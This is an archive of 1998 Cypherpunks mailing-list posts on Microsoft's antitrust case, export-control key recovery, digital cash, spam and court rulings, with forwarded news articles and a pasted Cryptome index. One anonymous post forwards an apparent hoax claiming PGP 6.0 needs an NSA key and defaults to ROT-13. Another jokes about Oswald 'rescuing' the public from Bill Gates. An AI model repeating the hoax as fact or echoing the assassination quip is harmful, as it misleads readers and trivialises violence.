Personally, I believe that that time is coming sooner than most people
realize. That's because when someone figures out how to save everyone a
bunch of money with digital bearer certificates, they're going to make a
bunch of money doing it, and the race to the bottom-line will begin.

As I've said here several times before, the paradox will prove to be that
digital bearer settlement will be cheaper to use *because* they're
physically anonymous. You don't *care* what the biometric identity of
someone is, as long as you're protected from bad economic actors, and can
do reputation damage to people who you can prove have damaged you
financially.

Which, as we all know here, is simply a matter of financial cryptography.


The cost of anything is the foregone alternative. People will only demand
more privacy when it's cheaper than not having it. I believe that that time
is coming, rather quickly.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 4 Feb 1998 04:34:08 +0800
To: "Attila T. Hun" <cypherpunks@cyberpass.net>
Subject: Re: the best justice money can buy --Lessig suspended
In-Reply-To: <19980203.154218.attila@hun.org>
Message-ID: <v03102802b0fd25414459@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




I very strongly disagree with Attila the Hun on his views about Microsoft.
But I won't argue the case here.

My comments below are just on some specific points. His general outlook I
am completely at odds with.

At 7:49 AM -0800 2/3/98, Attila T. Hun wrote:

>    at this point, I would say M$ has won the game. W98 will
>    be released with IE4 as the desktop, complete with push
>    channels and www.msn.com --at that point, Jackson --if

On this we agree. Microsoft cannot lose at this point. NT 5.0 and Windows
98 are presumably coming, and will be on 97% of all desktops.

The issue of Netscape's browser is mostly meaningless, anyway, from a
revenue standpoint. Navigator is now free for all users. Unless Big Brother
tells MS what it must sell its browser for--shades of the "Anti Dog-eat-Dog
Law" in "Atlas Shrugged"--it is likely to remain this way.

(The real issue is going to be Web servers. Whether Netscape can prosper in
the world that is coming is unclear.)


>    so... we will have multiple choice of OS: M$ on Intel,
>    M$ on SGI, M$ on Alpha --and SUN goes down the tubes as

I wouldn't be so sure about these choices, either! SGI is hedging their bet
on the MIPS processor family by porting to Intel processors and NT.  (I
predict SGI will drop the MIPS line for workstations and desktops, leaving
the MIPS chips for Nintendo 64 and other such controller-oriented uses.)

And Compaq has announced plans to acquire DEC, so the future of the Alpha
processor is even more in doubt than before. (News reports are that the
deal Intel made with DEC may be killed by this Compaq deal...and even if
both deals go through, Compaq is unlikely to deviate in a major way from
the Intel processor line.)

Even Sun has announced major plans to port Solaris to the Intel Merced
line. (They've long had ports...I mean a _serious_ port. Probably meaning a
move away from the SPARC line.)

So, we've got:

-- MS on Intel-based systems from all major PC makers

-- MS on Intel-based systems from DEC

-- MS on Intel-based systems from SGI

-- MS on Intel-based systems from H-P

-- Solaris and H-PUX (or whatever H-P's UNIX is called) on Intel Merced

And so on.

(I've left out the PowerPC, as it appears now to be limited solely to the
Macintosh market...even IBM and Motorola appear to have acknowledged its
failure.)

Looks to me like Intel is the real winner here.

(And even Intel's competitors in the "Intel compatible" market are
struggling, unable to make the chips. I've written about this several
times. Just yesterday National Semiconductor admitted that its Cyrix chip
unit was losing sales, falling further behind, having huge losses, and not
producing needed new chips. Meanwhile, PC makers who foolishly committed
designs to the AMD design are unable to deliver....CyberMax committed to
the K6 line and is now unable to ship its only product, as the limited
number of chips AMD can make are trickled out to other companies.)

As for Attila's calls to break up MS...could make Bill Gates immensely
wealthier, as he'd then have a piece of the 5 most successful software
companies!

(I assume Attila is not arguing for simply seizing his property and giving
it to others, or running it as a government company, or just padlocking the
doors....)

--Tim May




"National borders aren't even speed bumps on the information superhighway."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Wed, 4 Feb 1998 04:40:33 +0800
To: cypherpunks@cyberpass.net
Subject: New RAND IW Study
Message-ID: <v03102802b0f992e7e6fa@[208.129.55.201]>
MIME-Version: 1.0
Content-Type: text/enriched

 A very interesting RAND study, In Athena's Camp, was recently released. From the preface:

"New modes of war, terrorism, crime, and even radical activism-are
all these emerging from similar information-age dynamics? If so,
what is the best preparation for responding to such modes? When
the subject is warfare, for example, it is common wisdom that militaries
tend to prepare for the last war, and there is much historical
evidence to support this notion. Today, however, it is clear that defense
establishments around the world-and especially in the United
States-are thinking about how war will change, how the "revolution
in military affairs" (RMA) will unfold, and how the next war may well
be quite different from the last. Whether the focus is warfare, terrorism,
crime, or social conflict, we have striven to anticipate what the
spectrum of future wars and other types of conflicts will look like."

http://www.rand.org/publications/MR/MR880

--Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve <sorrin@syndata.com>
Date: Wed, 4 Feb 1998 01:48:49 +0800
To: cypherpunks@Algebra.COM
Subject: BSAFE 4.0 to force GAK?!
Message-ID: <34D75774.6036@syndata.com>
MIME-Version: 1.0
Content-Type: text/plain



FYI

Jan. 26's Network World has an article on page 33 titled "RSA blasts
(but also supports) Government encryption policy".

The paragraph of note is the fourth paragraph which reads:"The next
version of the RSA encryption toolkit, BSAFE 4.0, will force those
building products with anthing over 56 bit strength encryption to use a
key-recovery center for exportable products...."

I haven't been able to confirm this with other sources yet but the
glaring question is how will this be enforced and how will it affect
domestic products that wish to use BSAFE 4.0 for their crypto. Further
what ramifications does this hold for their S/Mail toolkit for S/MIME?
and I haven't seen this discussed on the list yet.
Steve O
-- 
A picture tells a thousand words.
		Stego


     -----BEGIN GEEK CODE BLOCK-----
     Version: 3.1
     GCS/IT/S d--() s+: a-- C++++(++)$ ULS+++@ P++@ L+(++)$ E- W+(+++)$
     N++$ !o K-? w++(+++)$ !O+>++ !M !V PS+(+++)@ PE(++)@ Y++$ PGP@ t+@
     5++@ X++>$ R+++>$ tv+@ b+@ DI+++>$ D+++@>$ G@ e++@>++++ h r* y+ 
     ------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Wed, 4 Feb 1998 02:33:51 +0800
To: tcmay@got.net (Tim May)
Subject: Re: UrsinePunks  (Re: County Mounties Spit on the 4th Amendment)
In-Reply-To: <v03102800b0fcfe020bd6@[207.167.93.63]>
Message-ID: <199802031748.MAA24574@alcove.wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May enscribed thusly:
> At 6:25 AM -0800 2/3/98, Michael H. Warfield wrote:

> >"Supertroupers" refers to State Patrol.  The term "Smokie" (coined from
> >the movie Smokie and the Bandit) refers to all police.

> Nope, not coined from the movie.

> Just the reverse.

> Highway cops were called "smokies" (or "smokeys") when I was growing up in
> Virginia in the 60s, long before the movie.

	Point conceded.  Quite correct.

> I haven't checked the derivation, but had always assumed it came from the
> Smokey the Bear figure, who wore a tall, broad-brimmed hat (also known as a
> campaign hat). The hat worn by many state highway patrols. Ergo, "smokeys."

	Yeah, I think that's true as well, now that you remind me.

> (I used to see the _real_ Smokey the Bear at the Washington Zoo. I think he
> died of old age in the 1970s.)

> (A URL with a few details is
> http://www.4j.lane.edu/websites/roosevelt/Connections/smokey.html)


> --Tim May, posting from the Bear State

> "National borders aren't even speed bumps on the information superhighway."
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^3,021,377   | black markets, collapse of governments.

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pepe" <ariel.jl.1917@mx3.redestb.es>
Date: Tue, 3 Feb 1998 21:36:49 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199802031315.FAA00642@toad.com>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Feb 1998 06:02:41 +0800
To: cypherpunks@toad.com
Subject: Re: The War on Some Debts
In-Reply-To: <199802031640.KAA18766@wire.insync.net>
Message-ID: <X59Bke2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Cordian <emc@wire.insync.net> writes:

> 
> In a further blatant erosion of Constitutional rights, the California
> Supreme Court has ruled that a person owing child support who fails to
> seek or accept work may be jailed and fined for contempt of court, and
> that this does not violate any Constitutional bans on involuntary
> servitude or imprisonment for debt. 
>  
> This reverses nearly a century of contrary rulings.  Look for this
> "improved" interpretation to be expanded to other kinds of debts and
> judgments as well, as soon as massive public acceptance of it for the
> carefully picked child support issue is engineered. 
>  
> The credit card companies are no doubt carefully analyzing this decision
> as we speak. 

Ah yes; once it's established that a parent owing alimony can be forced
to work "to protect the children", expect similar treatments for taxes
and credit card debt and judgments.
The credit card issues are also lobbying very hard to exempt credit card
debts from bankrucpy.
For most of humanity's history, interest rates on loans to individuals
were around 100-200% per annum; default rate was proportionate; bad
debtors were jailed or enslaved; children inherited debt; etc. 

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Wed, 4 Feb 1998 03:38:22 +0800
To: cypherpunks@ssz.com
Subject: A fatal flaw in PGP 6.0
Message-ID: <e733397cdc30125650f2bba5ea2fbb3b@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



This was posted anonymously to alt.security.pgp last night

>Subject: PGP 6.0 alpha3
>Date: 3 Feb 1998 00:15:56 +0100
>
>Anyone else having problems with the alpha of PGP 6.0?  When I try to
encrypt e-mail I get an error:
>
>FATAL ERROR
>
>Unable to find key "ghost@nsa.gov"
>Please obtain a new key from Network associates.
>
>
>Other than that it's pretty slick!  I'm not sure I'd have the default
cypher as ROT-13 though!  I changed mine to RC-2 255-bit.
>
>Anyone else?

Anyone like to confirm this?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Fraser <simonf@uk.uu.net>
Date: Tue, 3 Feb 1998 22:48:39 +0800
To: cypherpunks@toad.com
Subject: Re: Spammers
In-Reply-To: <v03102807b0fcd856e294@[207.79.65.77]>
Message-ID: <Pine.GSO.3.95.980203143214.28974D-100000@pool.uunet.pipex.com>
MIME-Version: 1.0
Content-Type: text/plain




Note: What I write here are my own views, not necessarily those of my
company. 


On Tue, 3 Feb 1998, Chip Mefford wrote:

> Wouldn't it be nice to hold uu.net culpable for all their spamming ways. They
> want to own the internet, let them hang for it.

http://www.us.uu.net/support/usepolicy/
It would be nice to differentiate between the spammers themselves and the
ISP they use. 


Simon.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Wed, 4 Feb 1998 01:39:50 +0800
To: rantproc <cypherpunks@cyberpass.net>
Subject: the best justice money can buy --Lessig suspended
Message-ID: <19980203.154218.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>>> the best justice money (and politics) can buy

    I really do not believe this --this is bought justice
    as appeals courts never, or at least rarely such as a 
    blatant in the case of a blatant error in a capital 
    murder criminal trial, interfere with a sitting federal
    judge.

    the damage is immense; it delays the first round of
    adjudication by at least 5 months. if I were Joel Klein 
    I would go for the jugular and file action for an 
    immediate divestiture of M$ including injunctions
    against operations and management by Bill Gate$ and
    Steve Ballmer. the appeals court would probably suspend
    the actions, but they would still be there and on the
    table. 

    Jackson at this point will be furious --hopefully he
    keeps total cool. the obvious next move on the part of
    M$ will be to have Jackson disqualified for bias. that
    will make 2 judges in the DC circuit who M$ has wasted.
    Royce Lambert refused to accept the 1994 plea bargain
    --obviously M$ would ask him to recuse if his name came
    out of the barrel; theoretically, cases are assigned by
    lottery --in reality, you can influence the choice of a
    judge as the cases are assigned at the time of filing by
    rotation. --M$ obviously is capable of shopping for a
    judge.

    at this point, I would say M$ has won the game. W98 will
    be released with IE4 as the desktop, complete with push
    channels and www.msn.com --at that point, Jackson --if 
    he is still the sitting judge-- will be forced to make a 
    bad law decision if he tries to block it on the 1994
    agreement: the product is 'integrated' --M$ had the 
    foresight to hoodwink the DOJ --Royce Lambert saw 
    through the smoke screen but the appeals court removed
    him from the case.

    so... we will have multiple choice of OS: M$ on Intel, 
    M$ on SGI, M$ on Alpha --and SUN goes down the tubes as
    they will never capitulate.  M$ will bury IBM with their 
    NT alliance with Ahmdal who clones all the IBM iron 
    --which is fading against the clustered servers. IBM 
    long since gave in on OS/2 versus M$ --it may figure in 
    their corporate strategy, but unless they are willing to
    update past Netscape 2.02 they will lose that as well
    --in fact you can no longer any of the IBM PCs with OS/2
    preloaded --except by special order: in quantity.

    Bill Gate$ for President?  might as well... maybe Lee 
    Harvey Oswald will come to the rescue.

Lessig appointment suspended
By Dan Goodin, C|Net
February 2, 1998, 6:40 p.m.  PT

A federal appeals court has immediately suspended the
appointment of a contested computer expert charged with
collecting and weighing evidence in the antitrust case the
Justice Department has brought against Microsoft.

In a ruling handed down late Monday, the U.S.  Court of
Appeals for the District of Columbia granted Microsoft's
request to halt, pending further review, the proceedings
before visiting Harvard Law School professor Lawrence
Lessig.  U.S.  District Judge Thomas Penfield Jackson
appointed Lessig a "special master" in mid December, giving
the computer and Internet law expert until May 31 to
recommend factual and legal findings in the high-profile
case.

The one-page ruling is a significant--but by no means
final--win for Microsoft, which repeatedly has objected to
Lessig's appointment.  In briefs filed first in district
court and then with the court of appeals, Microsoft
strenuously has opposed the designation of any special
master in the case, but has argued further that Lessig is an
inappropriate choice because he appears to be biased against
the software giant.

In a sternly worded order issued two weeks ago, Jackson
denied Microsoft's request, calling the allegations of bias
"trivial" and "defamatory."  Today's ruling by the court of
appeals is in stark contrast to Jackson's order, and may
indicate that the three-judge panel assigned to hear matters
in the case sees things in a different light.

Rather than permanently halting the proceedings, today's
ruling is an agreement only to consider Microsoft's
challenge to the special master--known in legal parlance as
a writ of mandamus.  In a sign that the judges may be
inclined to agree with Microsoft's arguments on the issue,
however, they handed Redmond an additional win by
immediately halting the proceedings scheduled to take place
before Lessig while the challenge is being heard.

"It is extremely unusual for a court of appeals to reach
down and stop what a district court has ordered," said Rich
Gray, an antitrust attorney at Bergeson, Eliopoulos, Grady &
Gray.  "The court of appeals is saying, 'We're interested in
hearing more about this, and in the meantime, we're going to
put the special master on hold.'"

A Microsoft spokesman agreed.  "This is a very positive
step, but it's only one small step in a long process," said
Jim Cullinan.  "We look forward to presenting our evidence
to the appeals court as well as the trial court."

The court of appeals already had agreed to hear a separate
appeal, in which Microsoft is fighting a preliminary
injunction Jackson issued in December that requires
Microsoft to separate browser software from its Windows
products.  Today's ruling consolidates both motions into the
same April 21 hearing.  It also requires both sides to file
additional briefs concerning the special master challenge by
April 7. Moreover, the government must file its opposition
to Microsoft's appeal of the preliminary injunction by March
2, and Microsoft must respond to that brief by March 9.

Justice Department representatives were not immediately
available for comment.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNc8R7R8UA6T6u61AQH3swIAtVNkbSk80Crg/dseQOP4pPpIbEDGchsl
rWj/sEmXn/2EnWxXBTp4OnkRpJlFbobhbkT3lJqE4Jj2V+MnEGUFzw==
=9S7I
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Wed, 4 Feb 1998 01:40:48 +0800
To: rantproc <cypherpunks@cyberpass.net>
Subject: too little too late: SPA takes on M$
Message-ID: <19980203.151905.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>>> too little and too late, SPA takes on Microsoft

    this might have been a good action in so much as they 
    are well entrenched, in part on M$' money, as Washington
    lobbiests. now, with Lessig's role as the court 
    appointed expert suspended by the appeals court until a
    21 Apr hearing (submissions due in early April), their
    voice will be lost in the court action. any action they
    stimulate with Orrin Hatch's judiciary is a) too late;
    too slow --at least two years; 3) of little consequence 
    as Congress can not legislate against a specific company
    --they can legislate by regulation against an industry; 
    and, 4) more importanty, the Appeals Court castrated
    Johnson's order for the special administrator. 

    still, it is another voice; even though the guidelines 
    are bland, there is no mistalking who the target is; 
    and, in typical M$' fashion they are threatening to drop
    their membership instead of renewing in August.

    there are three areas where M$ is exercising monetary
    influence, even control of the agenda, in legislation or
    justice: the DOJ action with their crying to Daddy (the
    appeals court), the SPA guidelines which they intend to
    force SPA to withdraw, and as part of the closed circle
    negotiating the rules on intellectual property and trade
    for the Western Hemisphere free trade zone --closed
    meetings.

    as I said: Gate$ makes Cornelius Vanderbilt look like a 
    choir boy.


Software group takes on Microsoft 
By Courtney Macavinta
February 2, 1998, 5:05 p.m.  PT

As the federal antitrust lawsuit against Microsoft barrels
forward, a prominent high-tech trade association tomorrow
will release a list of competition principles that strike at
the heart of the case and angered the software giant.

The Software Publishers Association (SPA) hasn't officially
responded to the Justice Department's accusations that
Microsoft violated a 1995 consent decree by requiring
computer makers to bundle its Internet Explorer browser as a
condition of licensing its Windows 95 operating system.  But
the new guidelines echo some of its smaller members' and the
government's complaints regarding Microsoft.

The SPA's guidelines come one day after New York State's
attorney general said he and ten other state prosecutors
subpoenaed Microsoft for evidence of potentially illegal
bundling of Windows and Internet software.  In addition, the
Senate Judiciary Committee and regulatory agencies from
Japan and the European Union also are looking into
Microsoft's business practices.  (See related story)

The SPA says it set out to develop the principles to define
its role in the fair competition debate, which focuses on
its largest member.  The SPA has been sought for advice by
lawmakers in the past, and it states that the new principles
are intended to "guide government officials" in antitrust
enforcement.

Hitting home with Microsoft foes, the SPA principles state:
"Operating systems should not be used to unfairly favor its
own products and services, or its favored partners, over
those competing vendors.  The operating system vendor should
not include its own services or products as part of the
operating system or user interface unless it gives the same
ability to integrate products and services into the
operating system to competing vendors."

The SPA went on to state that "the tying of certain
applications to the sale of other applications has the
effect of restraining competition among independent software
vendors for the 'virtual shelf space' of [PC makers]."
Dominant operating systems also should not "favor Internet
content" that it owns or licenses, according to the
guidelines.

The principles say that healthy competition is reliant on
equal access to retail customers.  On the other hand,
pre-announcing products that do not exist yet, so-called
vaporware, stifles competition.

Prior to developing the principles, the 1,200-member group
surveyed its domestic members.  Of the 164 that responded,
anticompetitive activity was a top concern.  As reported in
January, the issue also took the spotlight at two scheduled
meetings in Santa Clara, California.  The SPA's Government
Affairs Committee even met with Joel Klein, the Justice
Department's lead attorney in the lawsuit against Microsoft.

Microsoft fired back today, calling the SPA's process
"short-sighted" and the publication of the principles
"self-destructive."  The company also quipped that it is
undecided on whether it will renew its SPA membership, which
expires in August.

Although Microsoft was present at the SPA's California
meetings last month, so were some of its main competitors,
such as Novell, Netscape Communications, Apple Computer, and
Oracle Corporation.

"It's unfortunate that a handful of Microsoft's competitors
are trying to use the SPA to drive a wedge into the software
industry.  This whole process has been such an obvious
attack on Microsoft," Mark Murray, a spokesman for the
company, said today.

"I think the primary impact of this is that the SPA will be
discredited, and that it will weaken their ability to serve
as a legitimate voice," he added.

The SPA knew its principles would be searched for hidden
meaning regarding the Microsoft case, but the group contends
it wasn't targeting the company.

"The principles are not intended to prescribe remedies that
might be applied by federal and state antitrust enforcers to
any particular company or set of circumstances," SPA
president Ken Wasch said in a statement.  "Nor are these
principles a call for general regulation of our industry.
Rather, the principles reflect an industry consensus of how
some business practices promote or impair strong
competition."

Still, for a group with no regulatory power, the SPA's
opinion will hold some weight.  The group is expected to
testify before the Senate Judiciary Committee when it holds
hearings on issues of competition in the high-tech industry
this year.

Moreover, the new principles amend the organization's
existing guidelines, which were presented to the Federal
Trade Commission during a hearing two years ago.  During the
hearing, the SPA advised the government to carefully
scrutinize companies that allegedly impede others from
getting space on retail store shelves.  The SPA also took
the position that owners of dominant operating systems
should release essential technical information to other
developers.  Both points remain in the new eight-point plan.

The remaining SPA competition principles include:

Maximize innovation to benefit consumers.

The owners of dominant operating systems should license
their "interface specifications to any third party for the
purposes of developing application software."

"Barriers" should not be put up by dominant operating
systems that limit consumers' or hardware makers' ability to
reconfigure their desktops or utilize any software or online
content services.

Software vendors "should not intentionally disable, cripple,
or otherwise interfere with the intended functionality and
execution of other products."

Operating systems should not prohibit Web sites from
"exploiting the access capabilities of competing products"
or force sites to display and promote their products.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNc1UbR8UA6T6u61AQHEQwH/cpSHIdQwCR0XVoxqEVya3E15ZBrmI5M8
hln8Dm2qFF39UjsNVLJhp4J4xDnyTdeRCDkGDixzI5qJqDwChz5prw==
=sN0q
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Wed, 4 Feb 1998 07:07:56 +0800
To: cypherpunks@cyberpass.net
Subject: Microsoft
Message-ID: <485f03d3211e0c7c6edc431cbfc8dc87@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



>    so... we will have multiple choice of OS: M$ on Intel,
>    M$ on SGI, M$ on Alpha --and SUN goes down the tubes as
>    they will never capitulate.  M$ will bury IBM with their
>    NT alliance with Ahmdal who clones all the IBM iron
>    --which is fading against the clustered servers. IBM
>    long since gave in on OS/2 versus M$ --it may figure in
>    their corporate strategy, but unless they are willing to
>    update past Netscape 2.02 they will lose that as well
>    --in fact you can no longer any of the IBM PCs with OS/2
>    preloaded --except by special order: in quantity.


I really am not so worried about Microsoft's software strategy as I am
about their communication infrastructure strategy.  Every time I go to
a computer show or swap meet, I see stacks of Linux CDs selling like hot
cakes.  Most anyone with a clue who doesn't like Billy's crapware knows
precisely where to find something better.

What concerns me more is the partnerships that Billy & Co. are making
with internet providers, especially cable & DSL.  Many of the cable
modem service providers have notoriously bad reputations for using packet
filters to block stuff they don't like.  These days, any internet
provider who tries that shit usually finds its customers going elsewhere,
but when there's only one or two cable providers and Mickeysoft owns them
all, then what?

The solution, of course, is encrypted IP, something which has been moving
far too slowly.  Frankly I'm pretty disappointed with the apparent
unwillingness of several IETF members to address the obvious MITM attacks,
such as CBC cut-and-paste.  It is going to royally suck when we have to
redo it because the protocol didn't work the first time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 4 Feb 1998 10:52:45 +0800
To: webmaster@cylink.com
Subject: Jim Omura
Message-ID: <34D7D1DC.4EC6@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 2/3/98  7:22 PM

Jim

Let's get this settled.

I have not read

cylinked.htm       Latest: Cylinked to Organized Crime?             
January 29, 1998

YET.

Hope you liked the SAND report, now posted at jya.com, I sent
you in 1992.

I listened carefully at the breakfast you, I, Lou {lew?} Morris
had.

Later
bill

Title: Cryptome







  
    
      
	  
	  Cryptome
	
	
	
	
	JYA/Urban
	Deadline
	
	OpEd
    
  


_______________________________________________________________________________________

File               Topic                                             Date

_______________________________________________________________________________________


In Athena's Camp   Preparing for Conflict in the Info Age (offsite)  February 3, 1998
cylink-sins.htm    Cylink Secures SINS                               February 3, 1998
pg-get-MSkey.htm   Update: How to Recover Private Keys for MS Wares  February 3, 1998

bxa020398.txt      Exports of High Performance Computers             February 3, 1998
sib.htm            Scientists in Black                               February 3, 1998
CAP                The Cryptographic Analysis Program (offsite)      February 2, 1998
Arne Beurling      The Geheimschreiber Secret (offsite)              February 2, 1998
Army Stegano       US Army Steganography (offsite)                   February 2, 1998

<A HREF="http://www.cranfield.ac.uk/ccc/bpark/colossus.htm
">Colossus           Rebuilding Colossus (offsite)                     February 2, 1998
Frode Crypto       Cryptology Papers (offsite)                       February 2, 1998
jimbell9.htm       Jim Bell Update                                   February 2, 1998
echelon-boost      NSA Surveillance System Boosted (offsite)         February 2, 1998
cn020298.txt       Crypto News                                       February 2, 1998

bxa020298.txt      BXA Meet on Export Rules and Procedures           February 2, 1998
cs020298.txt       Rules to Challenge Customs Seizures (63K)         February 2, 1998
usg020298.txt      USG Secret Meets                                  February 2, 1998
echelon.htm        NSA Global Surveillance System                    February 2, 1998
cathedral.htm      The Cathedral and the Bazaar                      February 1, 1998

natsec-rule.htm    Protection of National Security Information       February 1, 1998
47cfr216.txt       National Communications Issuance System (106K)    February 1, 1998
47cfr213.txt       Emergency Telecomms Precedence System (17K)       February 1, 1998
47cfr202.txt       National Security Emergency Plans & Ops (27K)     February 1, 1998
47cfr201.txt       Policy for Telecomms During Emergencies (12K)     February 1, 1998

44cfr336.txt       Facilities for National Security Emergency (14K)  February 1, 1998
44cfr334.txt       FEMA Graduated Mobilization Response (14K)        February 1, 1998
32cfr322.txt       Privacy Act Exemption for NSA Records (40K)       February 1, 1998
32cfr299.txt       National Security Agency FOIA Program (8K)        February 1, 1998
32cfr2101.txt      National Security Council FOIA Requests (24K)     February 1, 1998

32cfr185.txt       Military Support to Civil Authorities (52K)       February 1, 1998
31cfr9.txt         Effects of Imported Articles on National Security February 1, 1998
22cfr124.txt       Contracts, Off-Shore Buys, Defense Services (42K) February 1, 1998
22cfr123.txt       Licenses for the Export of Defense Articles (51K) February 1, 1998
22cfr121.txt       United States Munitions List (92K)                February 1, 1998
_______________________________________________________________________________________


ntia-dnsdrft.htm   Draft Proposal for New Domain Name System         January 30, 1998
korczak.txt        Boris Korczak: CIA Agent Seeks Payment            January 30, 1998
pm87.txt           Prez on Terrorist Threat to Middle East Peace     January 30, 1998

leahy-wipo.txt     Senator Leahy on Ratifying WIPO Treaties          January 30, 1998
32cfr147.txt       DoD: Policies for Access to Classified Info       January 30, 1998
32cfr148.txt       DoD: Facilities for Storing Classified Info       January 30, 1998
32cfr149.txt       DoD: National Policy on Technical Surveillance    January 30, 1998
ntia012798.htm     RFC: Self-Regulation for Privacy Protection       January 30, 1998

cylinked.htm       Latest: Cylinked to Organized Crime?              January 29, 1998
websoft-warn.htm   Web Software Warning                              January 29, 1998
scant-peril.htm    U.S. Spy Agencies Pauline Peril                   January 29, 1998
mossburg.htm       E-Comm Forum on E-Authentication and DigSig       January 29, 1998
pollard.htm        Bankers O Table on E-Authentication and DigSig    January 29, 1998

brown.htm          Secret Service on Financial Instruments Fraud     Janaury 29, 1998
rpk-hack.htm       Invite to Hack RPK InvisiMail                     January 29, 1998
nrc012998.txt      Generic Letter on Y2K Readiness for Nuke Plants   January 29, 1998
fc012998.txt       FinCEN RFC on Information Collection              January 29, 1998
dtc012998.txt      Arms Export to Saudi Arabia                       January 29, 1998

nsa-etc-nf.htm     NSA, Echelon, Trade & Crypto/Netscape & Fortify   January 28, 1998
dod012898.txt      DoD Blacklist of Higher Education                 January 28, 1998
47usc1002.txt      Interception of Digital and Other Communications  January 28, 1998
cn012898.txt       Crypto News                                       January 28, 1998
cn012798.txt       Crypto News                                       January 27, 1998

bxa-fy98.txt       BXA Funding FY 1998                               January 27, 1998
cia-tsang.htm      CIA Concedes Spying on Americans                  January 26, 1998
atpc.htm           EU-Parliament: Technologies of Political Control  January 26, 1998
us-crypto.htm      US Crypto Policy                                  January 25, 1998
pg-nzcrypto.htm    New Zealand Crypto Policy                         January 24, 1998

ra-ukcrypto.htm    UK Crypto Policy                                  January 24, 1998
whp012398.htm      Payne/Morales vs. NSA: Reply to Defendant         January 23, 1998
kellner.htm        Intellectuals and New Technologies (66K)          January 23, 1998
bxa012398.txt      BXA Penalizes Export Violator                     January 23, 1998
osd012398.txt      Compensation of North Viet-Imprisoned Operatives  January 23, 1998

dod012398.txt      Defense Dept Secret Meets                         January 23, 1998
walton-pk.htm      GCHQ: The Pre-History of Public Key Cryptography  January 22, 1998
primer             The Proliferation Primer (offsite)                January 22, 1998
sh105-238.txt      Proliferation and US Export Controls (196K)       January 22, 1998
sh105-267.txt      Safety and Reliability of US Nukes (347K)         January 22, 1998

acda012298.txt     Arms Control Secret Meet                          January 22, 1998
pd012298.txt       Prez Notice on Mideast Terrorism Emergency        January 22, 1998
bia012298.txt      Rule on Indian Casinos                            January 22, 1998
cn012198.txt       Crypto News                                       January 21, 1998
fc98.htm           Financial Cryptography '98                        January 20, 1998

doj-ssgsup.htm     Supplement to Fed Guide for Seizing Computers     January 20, 1998
cn-netreg.htm      New Chinese Internet Regulations                  January 20, 1998
ietf-dea-97.htm    IETF Draft Encryption Algorithms 1997             January 20, 1998
radio-rec.htm      Update: Locating Radio Receivers; Encoder Stolen  January 20, 1998

pipenet.htm        PipeNet Description                               January 20, 1998
dod012098.txt      Defense Dept Secret Meets                         January 20, 1998
bernstein12.htm    Transcript of Bernstein Hearing                   January 19, 1998
fbi-umbc.htm       Barry Smith (FBI) to Speak on Encryption Policy   January 18, 1998
de-snoop.htm       Update: German Surveillance State                 January 17, 1998
bxa-wa-rule.htm    Update 2: BXA Rule on the Wassenaar Arrangement   January 16, 1998

